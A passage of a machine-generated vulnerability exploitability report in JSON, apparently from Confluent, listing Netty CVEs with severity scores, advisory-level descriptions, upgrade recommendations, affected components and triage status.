              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#e980273a-9a62-4a85-9c2f-8135cf54852a"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#452f36bc-1257-462e-be68-3441357bd4a9"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#e04de41b-97c5-498b-8d15-41f7208e534e"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#6891b98b-ab7c-4a7f-bbcc-d7028d024d43"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#ffca2055-bdcc-48ba-a02b-7f8b4f05e1c5"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#fec8eff5-36f1-4f25-b97e-a7bb4895aca5"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#f15a5acf-0141-412d-9010-ad66c9ccc187"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#a91cdedd-b4a6-4470-838a-22b6acd43058"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#d416ae40-8589-4057-bb2c-448810064092"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f474bdd3-7aa8-4a1a-aba9-80cac6870330"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f747dabd-5f9f-403d-9f5d-4e4b2a0e3bbe"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#eba1d71f-41d0-4939-b973-98bcf343783e"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fae2d073-4bb2-4b43-970a-b11ab31288b8"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e6dc16b9-c4f8-4bf5-b25e-ce73ea6183e5"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#f23f68af-3e1a-4be8-9061-a42dc2e93cb8"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c5d787ba-43fb-4c8b-b9b3-ebe7b50afaba"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#c8cfe000-6d4c-41e1-879a-4424e1d781ff"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#da8d2aa8-1d6b-457e-9269-50f2523ab3a3"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#85fb2588-e32f-4881-92f4-6260c3e2ba74"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d7243a57-4232-41ee-8221-57f283cc9db2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59899",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, `HttpContentEncoder` (the superclass of the production handler `HttpContentCompressor`) maintains a per-channel `ArrayDeque<CharSequence>` named `acceptEncodingQueue` that accumulates attacker-controlled data without any size limit. The queue is filled on the I/O thread for every inbound HTTP request and drained only when the application later writes a non-1xx response. This creates a resource exhaustion vulnerability when an attacker exploits HTTP/1.1 pipelining to flood the connection with requests faster than the application produces responses. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59899"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59899"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-q4f6-jm68-57ww"
        },
        {
          "url": "https://netty.io/news/2026/07/09/4-1-136-Final.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59899"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59899"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:25:31+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#e980273a-9a62-4a85-9c2f-8135cf54852a"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#452f36bc-1257-462e-be68-3441357bd4a9"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#e04de41b-97c5-498b-8d15-41f7208e534e"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#6891b98b-ab7c-4a7f-bbcc-d7028d024d43"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#ffca2055-bdcc-48ba-a02b-7f8b4f05e1c5"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#fec8eff5-36f1-4f25-b97e-a7bb4895aca5"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#f15a5acf-0141-412d-9010-ad66c9ccc187"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#a91cdedd-b4a6-4470-838a-22b6acd43058"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#d416ae40-8589-4057-bb2c-448810064092"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f474bdd3-7aa8-4a1a-aba9-80cac6870330"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f747dabd-5f9f-403d-9f5d-4e4b2a0e3bbe"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#eba1d71f-41d0-4939-b973-98bcf343783e"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fae2d073-4bb2-4b43-970a-b11ab31288b8"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e6dc16b9-c4f8-4bf5-b25e-ce73ea6183e5"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#f23f68af-3e1a-4be8-9061-a42dc2e93cb8"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c5d787ba-43fb-4c8b-b9b3-ebe7b50afaba"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#c8cfe000-6d4c-41e1-879a-4424e1d781ff"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#da8d2aa8-1d6b-457e-9269-50f2523ab3a3"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#85fb2588-e32f-4881-92f4-6260c3e2ba74"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d7243a57-4232-41ee-8221-57f283cc9db2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59900",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        }
      ],
      "cwes": [
        444
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, Netty's HTTP/2-to-HTTP/1.x translation layer (`Http2StreamFrameToHttpObjectCodec` and `InboundHttp2ToHttpAdapter`) fails to deduplicate or validate `Host` headers when an HTTP/2 client supplies both the `:authority` pseudo-header and a literal `host` header in a single HEADERS frame. The translator maps `:authority` to `Host` and separately copies the literal `host` header, producing an `HttpRequest` object containing two `Host` headers with attacker-controlled differing values. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http2 to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59900"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59900"
        },
        {
          "url": "https://github.com/advisories/GHSA-c69g-56f8-xwqj"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-c69g-56f8-xwqj"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59900"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59900"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:29:01+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#07d93b67-552f-4119-9c65-d6cdd9e789b2"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#5f03ab22-e65e-4a62-b1da-61973b033895"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#ffded10c-b959-42a1-a1ba-cb17ec729467"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#ba8adc44-56ff-4758-95b7-46c78c0be50d"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#db8e300f-5ea2-4259-8358-9470c7947c8b"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#e775d419-0e29-4bf9-8d00-d98ef0f7b8b1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#e51c59a1-a852-46c1-b00a-b51cf9fd41dc"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#fddca967-93e3-4022-8272-5057a809f325"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#b9f1958e-5c9a-4e46-87d4-2c21c6b5296a"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#f09dc5a9-2ec0-4a0d-8ff4-40320a996a82"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e9f83c7b-c907-41f5-b7ad-fc80b7aabcd8"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#e9246126-9d9c-4bfc-8697-aa049821f301"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#f2d25672-6a7d-45ee-8ef5-fd3583977ba2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#90655021-3c64-48a7-a02e-b9a7624c48ea"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59901",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        835
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, the `Bzip2Decoder` handler in Netty's compression codec pipeline is vulnerable to a denial-of-service attack through a malformed bzip2 stream that permanently captures the event-loop thread in an infinite loop. The vulnerability exists in the run-length encoding (RLE) state machine within [`Bzip2BlockDecompressor.read()`]. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec to version 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59901"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59901"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-558v-64gr-wgg4"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59901"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59901"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:29:27+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#e97507ce-2a69-4b0f-ba71-a7e0f6160f7d"
        },
        {
          "ref": "urn:cdx:9f11845d-5c4f-4d50-a9ad-2d75f4051d3f/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#587f2e03-2507-454d-bcea-9aab322e0f22"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#7413e1aa-322e-476b-b35a-3aff66d2e4f1"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#8dc96865-4b07-4fad-9351-863f58cc64fe"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#62f8710d-3dc4-46c0-98dc-99675e9f35af"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#d47c5174-9b3b-4089-8945-26328b28ef98"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#bc8aa28d-95ae-4775-ac77-9b966a812a48"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#c0bec643-bc99-42eb-8b9f-bbfc05c50d40"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#f41fd205-a743-4917-a87e-a507f1b3b7bd"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#dd7fc835-667e-4aea-9a59-d706a4b674eb"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#c4ac7de9-1720-4ab4-ad22-a37fe476ccf3"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#e80ab953-0498-463e-930b-73820ae135e2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#f18510ca-cc40-4f42-826d-a856226cc8d5"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#e998901c-3140-4bfd-b396-fdb7801f1483"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#ffb690ff-e14e-484d-b32f-c55033fdbf14"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#c2e4c942-2a3c-4900-a3d0-e11d8b6611ee"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c2bb873c-136a-423d-a9a3-c99e29cf02b8"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#e3494660-a726-42ca-b556-bc77f5478a55"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#d03b09d9-97fe-4368-a058-ec80c8479569"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#a9e570a6-e291-4c7f-a00c-b276e3dcec29"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#f4702054-ffd7-4f4b-99e3-e66855b09520"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Netty's Bzip2Decoder is not used in the Confluent Platform codebase."
      }
    },
    {
      "id": "CVE-2026-59902",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, io.netty.handler.codec.sctp.SctpMessageCompletionHandler limits incomplete messages and fragment counts but not maxBufferedBytes, allowing unauthenticated peers to exhaust memory with large SCTP fragments. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.",
      "recommendation": "Upgrade io.netty:netty-transport-sctp to version 4.2.17.Final, 4.1.137.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59902"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/1b5abc6443b63726c72cdd285af2feb7ddbb8ff7"
        },
        {
          "url": "https://github.com/netty/netty/pull/17213"
        },
        {
          "url": "https://github.com/netty/netty/pull/17217"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.137.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.17.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-2qj4-mmr9-4v2f"
        }
      ],
      "published": "2026-08-17T18:17:36+00:00",
      "updated": "2026-08-18T15:16:55+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#c801758c-12c0-496f-9f8d-279db6cb0a09"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#e134a46a-6d1d-450d-8cd1-b5c67aa310a1"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#b7e21c80-52d5-47c0-abdc-0d53fb5603c8"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#dc267778-87cc-4bfa-90d7-dbef885e001b"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#e7bb8125-1b49-47ca-a6c3-a22a25c10b34"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#e75405d0-2cac-405e-ab5f-18a9befd6411"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#cae4e1b3-901d-4693-b288-0ea3364a682c"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#e30a2d51-51d8-4eab-b3f8-e660c1ecba53"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#c79bc2da-3f0b-4ed0-9d10-2e9a6772e8ba"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fe982424-ec70-41f4-bd75-0fe29ba98120"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#fc8fb56b-932a-4afe-9cb4-f1a3672ff0fe"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#a430d974-4818-413e-80d9-38537fb87552"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#e593f517-b4f2-4f22-83a7-b103cc030186"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-transport-sctp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#f5d05bae-8101-449a-820c-384f2a4fa131"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-59903",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N"
        }
      ],
      "cwes": [
        524
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, io.netty.handler.codec.http.cors.CorsHandler setVaryHeader replaces application Vary headers such as Authorization or Cookie with Origin, allowing a caching proxy or CDN to reuse authenticated responses across users and disclose sensitive information. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.17.Final, 4.1.137.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59903"
        },
